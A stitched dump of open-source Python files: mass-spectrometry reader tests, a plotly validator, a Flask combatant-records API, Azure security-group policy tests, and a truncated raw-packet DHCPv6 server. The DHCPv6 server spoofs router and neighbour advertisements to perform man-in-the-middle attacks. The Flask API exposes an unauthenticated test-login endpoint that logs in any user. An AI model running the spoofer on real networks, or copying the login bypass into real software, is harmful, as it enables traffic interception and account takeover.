start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_compressed_unindexed.info["mzml_version"]
obo_version = self.reader_compressed_unindexed.info["obo_version"]
spec_count = self.reader_compressed_unindexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_uncompressed_indexed.info["mzml_version"]
obo_version = self.reader_uncompressed_indexed.info["obo_version"]
spec_count = self.reader_uncompressed_indexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_uncompressed_unindexed.info["mzml_version"]
obo_version = self.reader_uncompressed_unindexed.info["obo_version"]
spec_count = self.reader_uncompressed_unindexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_bad_obo_version.info["mzml_version"]
obo_version = self.reader_bad_obo_version.info["obo_version"]
spec_count = self.reader_bad_obo_version.info["spectrum_count"]
run_id = self.reader_bad_obo_version.info["run_id"]
start_time = self.reader_bad_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator 2017 default obo = 4.1.0
self.assertEqual(obo_version, "4.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_obo_version.info["mzml_version"]
obo_version = self.reader_set_obo_version.info["obo_version"]
spec_count = self.reader_set_obo_version.info["spectrum_count"]
run_id = self.reader_set_obo_version.info["run_id"]
start_time = self.reader_set_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_year_obo_version.info["mzml_version"]
obo_version = self.reader_set_year_obo_version.info["obo_version"]
spec_count = self.reader_set_year_obo_version.info["spectrum_count"]
run_id = self.reader_set_year_obo_version.info["run_id"]
start_time = self.reader_set_year_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator 2017 default obo = 4.1.0
self.assertEqual(obo_version, "4.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_bad_obo_version.info["mzml_version"]
obo_version = self.reader_set_bad_obo_version.info["obo_version"]
spec_count = self.reader_set_bad_obo_version.info["spectrum_count"]
run_id = self.reader_set_bad_obo_version.info["run_id"]
start_time = self.reader_set_bad_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator set invalid obo = 1.1.0
self.assertEqual(obo_version, "1.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_no_obo_version.info["mzml_version"]
obo_version = self.reader_set_no_obo_version.info["obo_version"]
spec_count = self.reader_set_no_obo_version.info["spectrum_count"]
run_id = self.reader_set_no_obo_version.info["run_id"]
start_time = self.reader_set_no_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator set invalid obo = 1.1.0
self.assertEqual(obo_version, "1.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
def test_next(self):
"""
"""
ret = self.reader_compressed_indexed.next()
self.assertIsInstance(ret, Spectrum)
ret = self.reader_compressed_unindexed.next()
self.assertIsInstance(ret, Spectrum)
ret = self.reader_uncompressed_indexed.next()
self.assertIsInstance(ret, Spectrum)
ret = self.reader_uncompressed_unindexed.next()
self.assertIsInstance(ret, Spectrum)
def test_get_spec_count(self):
self.assertEqual(self.reader_compressed_indexed.get_spectrum_count(), 2918)
self.assertEqual(self.reader_compressed_unindexed.get_spectrum_count(), 2918)
self.assertEqual(self.reader_uncompressed_unindexed.get_spectrum_count(), 2918)
self.assertEqual(self.reader_uncompressed_unindexed.get_spectrum_count(), 2918)
def test_chrom_count_chrom_file(self):
reader = run.Reader(self.paths[3])
self.assertEqual(reader.get_chromatogram_count(), 3)
def test_chrom_count_spec_file(self):
reader = run.Reader(self.paths[0])
self.assertEqual(reader.get_chromatogram_count(), None)
    def test_readers_remember_spawned_spectra(self):
"""
Make multiple Readers, spawn 10 spectra each, mix them
and map them back to the reader who spawned them.
"""
pass
if __name__ == "__main__":
unittest.main(verbosity=3)
|
StSchulze/pymzML
|
tests/main_reader_test.py
|
Python
|
mit
| 9,619
|
import _plotly_utils.basevalidators
class ClicktoshowValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="clicktoshow", parent_name="layout.annotation", **kwargs
):
super(ClicktoshowValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "arraydraw"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", [False, "onoff", "onout"]),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/layout/annotation/_clicktoshow.py
|
Python
|
mit
| 555
|
# -*- coding: utf-8 -*-
"""Combatant API endpoints.
This module implements the REST API endpoints for managing combatants.
Currently included are:
CombatantApi: Invoked to create or update combatant records
CombatantListDataTable: Invoked to retrieve a list of combatant data formatted
for DataTables to consume
"""
# standard library imports
# third-party imports
from flask import request, jsonify, current_app
from flask_restful import Resource, fields
# application imports
from emol.decorators import login_required
from emol.models import Combatant
from emol.utility.date import string_to_date
@current_app.api.route('/api/combatant/<string:uuid>')
class CombatantApi(Resource):
"""Endpoint for combatant creation and updates.
Permitted methods: POST, PUT
"""
@classmethod
@login_required
def post(cls, uuid):
"""Create a new combatant.
Delegates incoming combatant data to the Combatant model class
See Combatant.create_or_update for the JSON object specification
Returns:
200 if all is well
400 if any error occurred
"""
if uuid != 'new':
return {'message': 'Illegal POST'}, 400
combatant = Combatant.create(request.json)
return {'uuid': combatant.uuid}, 200
@classmethod
@login_required
def put(cls, uuid):
"""Update an existing combatant.
Delegates incoming combatant data to the Combatant model class. If
valid data is passed and the combatant does not exist, it will be
created as if it were a POST request.
See Combatant.create_or_update for the JSON object specification
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
combatant.update(request.json)
return {'uuid': combatant.uuid}
@classmethod
@login_required
def delete(cls, uuid):
"""Delete a combatant.
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
current_app.db.session.delete(combatant)
current_app.db.session.commit()
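# Hypothetical client-side sketch, not part of emol: one way the CombatantApi
# endpoints above could be exercised. The base URL is an assumption, the caller
# is assumed to already hold an authenticated session, and combatant_payload
# must follow the JSON specification documented on Combatant.create_or_update
# (not reproduced here).
def _combatant_api_example(base_url, combatant_payload):
    import requests
    created = requests.post(base_url + '/api/combatant/new', json=combatant_payload)
    uuid = created.json()['uuid']
    requests.put(base_url + '/api/combatant/' + uuid, json=combatant_payload)
    requests.delete(base_url + '/api/combatant/' + uuid)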
@current_app.api.route('/api/combatant/<string:uuid>/authorization')
class CombatantAuthorizationApi(Resource):
"""Endpoint for managing combatant authorizations
Permitted methods: POST, DELETE
"""
@classmethod
@login_required
def post(cls, uuid):
"""Add an authorization
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline, create=True)
if card is None:
return
slug = request.json.get('slug')
card.add_authorization(slug)
@classmethod
@login_required
def delete(cls, uuid):
"""Remove an authorization
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline)
if card is None:
return
slug = request.json.get('slug')
card.remove_authorization(slug)
@current_app.api.route('/api/combatant/<string:uuid>/warrant')
class CombatantWarrantApi(Resource):
"""Endpoint for managing combatant warrants
Permitted methods: POST, DELETE
"""
@classmethod
@login_required
def post(cls, uuid):
"""Add a warrant
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline, create=True)
if card is None:
return
slug = request.json.get('slug')
card.add_warrant(slug)
@classmethod
@login_required
def delete(cls, uuid):
"""Remove an authorization
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline)
if card is None:
return
slug = request.json.get('slug')
card.remove_warrant(slug)
@current_app.api.route('/api/combatant-list-datatable')
class CombatantListDataTable(Resource):
"""Endpoint for the combatant DataTable.
Permitted methods: GET
"""
@classmethod
@login_required
def get(cls):
"""Retrieve combatant data for DataTables.
Create a list of combatant data including:
Legal Name
SCA Name
Card ID
Privacy policy accepted (boolean)
Combatant UUID
Returns:
The list, JSON encoded
"""
combatants = {'data': [
dict(
legal_name=c.decrypted.get('legal_name'),
sca_name=c.sca_name,
card_id=c.card_id,
accepted_privacy_policy=c.accepted_privacy_policy,
uuid=c.uuid
) for c in Combatant.query.all()
]}
return jsonify(combatants)
@current_app.api.route('/api/test-login/<string:user>')
class TestLoginApi(Resource):
"""
Permitted methods: POST
"""
@classmethod
def post(cls, user):
"""Create a new combatant.
Delegates incoming combatant data to the Combatant model class
See Combatant.create_or_update for the JSON object specification
Returns:
200 if all is well
400 if any error occurred
"""
from flask_login import login_user
from emol.models import User
user = User.query.filter(User.id == user).one()
login_user(user)
@current_app.api.route('/api/combatant/<string:uuid>/card-date')
class CombatantCardDateApi(Resource):
"""Endpoint for managing combatant card dates
Permitted methods: POST
"""
@classmethod
@login_required
def post(cls, uuid):
"""Renew a combatant's card for the given date.
Args:
uuid: The combatant's UUID
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card_date = request.json.get('card_date')
card = combatant.get_card(discipline, create=True)
if card is None:
return
card.renew(string_to_date(card_date))
|
lrt512/emol
|
emol/emol/api/combatant_api.py
|
Python
|
mit
| 6,847
|
# Copyright 2015-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from azure_common import BaseTest, arm_template
class NetworkSecurityGroupTest(BaseTest):
def setUp(self):
super(NetworkSecurityGroupTest, self).setUp()
def test_network_security_group_schema_validate(self):
with self.sign_out_patch():
p = self.load_policy({
'name': 'test-azure-network-security-group',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'ingress',
'ports': '80',
'access': 'Allow'},
{'type': 'egress',
'ports': '22',
'ipProtocol': 'TCP',
'access': 'Allow'}
],
'actions': [
{'type': 'open',
'ports': '1000-1100',
'direction': 'Inbound'},
{'type': 'close',
'ports': '1000-1100',
'direction': 'Inbound'},
]
}, validate=True)
self.assertTrue(p)
@arm_template('networksecuritygroup.json')
def test_find_by_name(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_allow_single_port(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '80',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_allow_multiple_ports(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '80,8080-8084,88-90',
'match': 'all',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_allow_ports_range_any(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '40-100',
'match': 'any',
'access': 'Allow'}]
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_deny_port(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '8086',
'access': 'Deny'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_egress_policy_protocols(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'egress',
'ports': '22',
'ipProtocol': 'TCP',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'egress',
'ports': '22',
'ipProtocol': 'UDP',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 0)
@arm_template('networksecuritygroup.json')
def test_open_ports(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
],
'actions': [
{
'type': 'open',
'ports': '1000-1100',
'direction': 'Inbound'}
]
})
resources = p.run()
self.assertEqual(len(resources), 1)
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '1000-1100',
'match': 'any',
'access': 'Deny'}]
})
resources = p.run()
self.assertEqual(len(resources), 0)
|
FireballDWF/cloud-custodian
|
tools/c7n_azure/tests/test_networksecuritygroup.py
|
Python
|
apache-2.0
| 7,188
|
# region Description
"""
dhcpv6_server.py: DHCPv6 server (dhcpv6_server)
Author: Vladimir Ivanov
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from raw_packet.Utils.base import Base
from raw_packet.Utils.utils import Utils
from raw_packet.Utils.tm import ThreadManager
from raw_packet.Utils.network import RawSniff, RawSend, RawEthernet, RawICMPv6, RawDHCPv6
from typing import Union, Dict, Any
from random import randint
from time import sleep
# endregion
# region Authorship information
__author__ = 'Vladimir Ivanov'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = 'Vladimir Ivanov'
__email__ = 'ivanov.vladimir.mail@gmail.com'
__status__ = 'Development'
# endregion
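# region Usage example
# Hypothetical usage sketch, not part of the upstream raw-packet project: how
# the DHCPv6Server class defined below is typically instantiated and started.
# The interface name 'eth0' is an assumption.
def _dhcpv6_server_example():
    dhcpv6_server = DHCPv6Server(network_interface='eth0')
    dhcpv6_server.start(ipv6_prefix='fde4:8dba:82e1:ffff::/64',
                        domain_search='domain.local',
                        quiet=True)
# endregion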
# region class DHCPv6Server
class DHCPv6Server:
# region Set properties
_base: Base = Base()
_utils: Utils = Utils()
_sniff: RawSniff = RawSniff()
_eth: RawEthernet = RawEthernet()
_icmpv6: RawICMPv6 = RawICMPv6()
_dhcpv6: RawDHCPv6 = RawDHCPv6()
_thread_manager: ThreadManager = ThreadManager(10)
_your: Dict[str, Union[None, str]] = {'network-interface': None, 'mac-address': None, 'ipv6-link-address': None}
_target: Dict[str, Union[None, str]] = {'mac-address': None, 'ipv6-address': None}
_clients: Dict[str, Dict[str, Union[bool, str]]] = dict()
_ipv6_prefix: str = 'fde4:8dba:82e1:ffff::/64'
_ipv6_prefix_address: str = 'fde4:8dba:82e1:ffff::'
_first_ipv6_address_suffix: int = 2
_last_ipv6_address_suffix: int = 65534
_domain_search: str = 'domain.local'
_solicit_packets_delay: float = 1
_disable_dhcpv6: bool = False
_exit_on_success: bool = False
_quiet: bool = True
# endregion
# region Init
def __init__(self, network_interface: str):
self._your = self._base.get_interface_settings(interface_name=network_interface,
required_parameters=['mac-address',
'ipv6-link-address'])
self._dns_server_ipv6_address: str = self._your['ipv6-link-address']
self._raw_send: RawSend = RawSend(network_interface=network_interface)
# endregion
# region Start DHCPv6 Server
def start(self,
target_mac_address: Union[None, str] = None,
target_ipv6_address: Union[None, str] = None,
first_ipv6_address_suffix: int = 2,
last_ipv6_address_suffix: int = 65534,
dns_server_ipv6_address: Union[None, str] = None,
ipv6_prefix: str = 'fde4:8dba:82e1:ffff::/64',
domain_search: str = 'domain.local',
disable_dhcpv6: bool = False,
exit_on_success: bool = False,
quiet: bool = False) -> None:
# region Set variables
self._ipv6_prefix: str = ipv6_prefix
self._ipv6_prefix_address: str = self._ipv6_prefix.split('/')[0]
self._disable_dhcpv6 = disable_dhcpv6
self._domain_search = domain_search
self._exit_on_success = exit_on_success
self._quiet = quiet
# endregion
# region Set target MAC and IPv6 address, if target IP is not set - get first and last suffix IPv6 address
# region Set target IPv6 address
if target_mac_address is not None:
self._target['mac-address'] = \
self._utils.check_mac_address(mac_address=target_mac_address,
parameter_name='target MAC address')
# endregion
# region Target IPv6 is set
if target_ipv6_address is not None:
assert target_mac_address is not None, \
'Please set target MAC address for target IPv6 address: ' + \
self._base.info_text(str(target_ipv6_address))
self._target['ipv6-address'] = \
self._utils.check_ipv6_address(network_interface=self._your['network-interface'],
ipv6_address=target_ipv6_address,
is_local_ipv6_address=False,
parameter_name='target IPv6 address')
self._clients[self._target['mac-address']] = {'advertise address': self._target['ipv6-address']}
# endregion
# region Target IPv6 is not set - get first and last suffix IPv6 address
else:
# Check first suffix IPv6 address
self._first_ipv6_address_suffix = \
self._utils.check_value_in_range(value=first_ipv6_address_suffix,
first_value=1,
last_value=65535,
parameter_name='first IPv6 address suffix')
# Check last suffix IPv6 address
self._last_ipv6_address_suffix = \
self._utils.check_value_in_range(value=last_ipv6_address_suffix,
first_value=self._first_ipv6_address_suffix,
last_value=65535,
parameter_name='last IPv6 address suffix')
# endregion
# endregion
# region Set recursive DNS server address
if dns_server_ipv6_address is not None:
self._dns_server_ipv6_address = \
self._utils.check_ipv6_address(network_interface=self._your['network-interface'],
ipv6_address=dns_server_ipv6_address,
is_local_ipv6_address=False,
parameter_name='DNS server IPv6 address',
check_your_ipv6_address=False)
# endregion
# region General output
if not self._quiet:
self._base.print_info('Network interface: ', self._your['network-interface'])
self._base.print_info('Your MAC address: ', self._your['mac-address'])
self._base.print_info('Your link local IPv6 address: ', self._your['ipv6-link-address'])
if self._target['mac-address'] is not None:
self._base.print_info('Target MAC address: ', self._target['mac-address'])
if self._target['ipv6-address'] is not None:
self._base.print_info('Target IPv6 address: ', self._target['ipv6-address'])
else:
self._base.print_info('First suffix offer IP: ', str(self._first_ipv6_address_suffix))
self._base.print_info('Last suffix offer IP: ', str(self._last_ipv6_address_suffix))
self._base.print_info('Prefix: ', self._ipv6_prefix)
self._base.print_info('Router IPv6 address: ', self._your['ipv6-link-address'])
self._base.print_info('DNS IPv6 address: ', self._dns_server_ipv6_address)
self._base.print_info('Domain search: ', self._domain_search)
# endregion
# region Send ICMPv6 advertise packets in other thread
self._thread_manager.add_task(self._send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
self._add_multicast_mac_addresses()
# endregion
# region Start Sniffer
# region Print info message
self._base.print_info('Waiting for a ICMPv6 or DHCPv6 requests ...')
# endregion
# region Set sniff filters
sniff_filters: Dict = {'Ethernet': {'not-source': self._your['mac-address']},
'UDP': {'destination-port': 547, 'source-port': 546},
'ICMPv6': {'types': [133, 135]}}
scapy_lfilter: Any = lambda eth: eth.src != self._your['mac-address']
if self._target['mac-address'] is not None:
sniff_filters['Ethernet'] = {'source': self._target['mac-address']}
scapy_lfilter: Any = lambda eth: eth.src == self._target['mac-address']
# endregion
# region Start sniffer
self._sniff.start(protocols=['IPv6', 'UDP', 'ICMPv6', 'DHCPv6'], prn=self._reply,
filters=sniff_filters,
network_interface=self._your['network-interface'],
scapy_filter='icmp6 or (udp and (port 547 or 546))',
scapy_lfilter=scapy_lfilter)
# endregion
# endregion
# endregion
# region Add multicast MAC addresses on interface
def _add_multicast_mac_addresses(self):
self._base.add_multicast_mac_address(interface_name=self._your['network-interface'],
multicast_mac_address='33:33:00:00:00:02',
exit_on_failure=False,
quiet=self._quiet)
self._base.add_multicast_mac_address(interface_name=self._your['network-interface'],
multicast_mac_address='33:33:00:01:00:02',
exit_on_failure=False,
quiet=self._quiet)
# endregion
# region Add client info in global self._clients dictionary
def _add_client_info_in_dictionary(self,
client_mac_address: str,
client_info: Dict[str, Union[bool, str]],
this_client_already_in_dictionary: bool = False):
if this_client_already_in_dictionary:
self._clients[client_mac_address].update(client_info)
else:
self._clients[client_mac_address] = client_info
# endregion
# region Send ICMPv6 solicit packets
def _send_icmpv6_solicit_packets(self):
try:
while True:
icmpv6_solicit_packet = \
self._icmpv6.make_router_solicit_packet(ethernet_src_mac=self._your['mac-address'],
ipv6_src=self._your['ipv6-link-address'],
need_source_link_layer_address=True,
source_link_layer_address=self._eth.make_random_mac())
self._raw_send.send_packet(icmpv6_solicit_packet)
sleep(self._solicit_packets_delay)
except KeyboardInterrupt:
self._base.print_info('Exit')
exit(0)
# endregion
# region Send DHCPv6 solicit packets
def _send_dhcpv6_solicit_packets(self):
try:
while True:
request_options = [23, 24]
dhcpv6_solicit_packet = \
self._dhcpv6.make_solicit_packet(ethernet_src_mac=self._your['mac-address'],
ipv6_src=self._your['ipv6-link-address'],
transaction_id=randint(1, 16777215),
client_mac_address=self._eth.make_random_mac(),
option_request_list=request_options)
self._raw_send.send_packet(dhcpv6_solicit_packet)
sleep(self._solicit_packets_delay)
except KeyboardInterrupt:
self._base.print_info('Exit ....')
exit(0)
# endregion
# region Send ICMPv6 advertise packets
def _send_icmpv6_advertise_packets(self):
icmpv6_ra_packet = \
self._icmpv6.make_router_advertisement_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac='33:33:00:00:00:01',
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst='ff02::1',
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
prefix=self._ipv6_prefix,
router_lifetime=5000,
advertisement_interval=
int(self._solicit_packets_delay * 1000))
try:
while True:
self._raw_send.send_packet(icmpv6_ra_packet)
sleep(self._solicit_packets_delay)
except KeyboardInterrupt:
self._base.print_info('Exit')
exit(0)
# endregion
# region Reply to DHCPv6 and ICMPv6 requests
def _reply(self, packet):
# region Get client MAC address
client_mac_address: str = packet['Ethernet']['source']
# endregion
# region Check this client already in self._clients dictionary
client_already_in_dictionary: bool = False
if client_mac_address in self._clients.keys():
client_already_in_dictionary = True
# endregion
# region Check MiTM status for this client
self._check_mitm_status(client_mac_address=client_mac_address)
# endregion
# region ICMPv6
if 'ICMPv6' in packet.keys():
# region ICMPv6 Router Solicitation
if packet['ICMPv6']['type'] == 133:
# Make and send ICMPv6 router advertisement packet
icmpv6_ra_packet = \
self._icmpv6.make_router_advertisement_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
prefix=self._ipv6_prefix,
router_lifetime=5000)
self._raw_send.send_packet(icmpv6_ra_packet)
# Print info messages
self._base.print_info('ICMPv6 Router Solicitation request from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')')
self._base.print_info('ICMPv6 Router Advertisement reply to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')')
# Delete this client from global self._clients dictionary
try:
del self._clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# Add client info in global self._clients dictionary
self._add_client_info_in_dictionary(client_mac_address,
{'router solicitation': True,
'network prefix': self._ipv6_prefix},
client_already_in_dictionary)
# endregion
# region ICMPv6 Neighbor Solicitation
if packet['ICMPv6']['type'] == 135:
# region Get ICMPv6 Neighbor Solicitation target address
target_address: str = packet['ICMPv6']['target-address']
na_packet: Union[None, bytes] = None
if target_address.startswith('fe80::'):
if target_address == self._your['ipv6-link-address']:
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation your address': True},
client_already_in_dictionary)
else:
na_packet = \
self._icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=self._your['mac-address'],
ipv6_src=self._your['ipv6-link-address'],
target_ipv6_address=target_address)
# endregion
# region Neighbor Solicitation target address is DNS server IPv6 address
if self._dns_server_ipv6_address != self._your['ipv6-link-address']:
if self._dns_server_ipv6_address.startswith(self._ipv6_prefix_address) or \
self._dns_server_ipv6_address.startswith('fe80::'):
if target_address == self._dns_server_ipv6_address:
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation dns server address': True},
client_already_in_dictionary)
# endregion
# region Neighbor Solicitation target address not in your ipv6 prefix
if not target_address.startswith(self._ipv6_prefix_address) and na_packet is not None:
for _ in range(10):
self._raw_send.send_packet(na_packet)
# endregion
# region Neighbor Solicitation target address in your ipv6 prefix
else:
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation in ipv6 prefix': True},
client_already_in_dictionary)
# endregion
# region DHCPv6 advertise address is set
# This client already in dictionary
if client_already_in_dictionary:
# Advertise address for this client is set
if 'advertise address' in self._clients[client_mac_address].keys():
# ICMPv6 Neighbor Solicitation target address is DHCPv6 advertise IPv6 address
if target_address == self._clients[client_mac_address]['advertise address']:
# Add client info in global self._clients dictionary
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation advertise address': True},
client_already_in_dictionary)
# ICMPv6 Neighbor Solicitation target address is not DHCPv6 advertise IPv6 address
elif na_packet is not None:
for _ in range(10):
self._raw_send.send_packet(na_packet)
# endregion
# endregion
# endregion
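        # Overview of the DHCPv6 branch below: a client Solicit (message-type 1) is
        # answered with an Advertise offering an address from self._ipv6_prefix, the
        # client's Request (message-type 3) is answered with a Reply confirming that
        # address, and Release (8) / Confirm (4) respectively clear or refresh the
        # per-client state kept in self._clients.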
# region DHCPv6
# Protocol DHCPv6 is enabled
if not self._disable_dhcpv6 and 'DHCPv6' in packet.keys():
# region Get Client identifier and Identity Association for Non-temporary Address
cid: Union[None, bytes] = None
iaid: Union[None, int] = None
for option in packet['DHCPv6']['options']:
if option['type'] == 1:
cid = option['value']['raw']
elif option['type'] == 3:
iaid = option['value']['iaid']
if cid is None or iaid is None:
self._base.print_info('Malformed DHCPv6 packet from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']))
return
# endregion
# region DHCPv6 Solicit
if packet['DHCPv6']['message-type'] == 1:
# Set IPv6 address in advertise packet
try:
ipv6_address = self._clients[client_mac_address]['advertise address']
except KeyError:
if self._target['ipv6-address'] is not None:
ipv6_address = self._target['ipv6-address']
else:
ipv6_address = self._ipv6_prefix_address + \
format(randint(self._first_ipv6_address_suffix,
self._last_ipv6_address_suffix), 'x')
# Make and send DHCPv6 advertise packet
dhcpv6_advertise = \
self._dhcpv6.make_advertise_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
transaction_id=packet['DHCPv6']['transaction-id'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
ipv6_address=ipv6_address,
cid=cid, iaid=iaid, preference=255)
self._raw_send.send_packet(dhcpv6_advertise)
# Print info messages
self._base.print_info('DHCPv6 Solicit from: ',
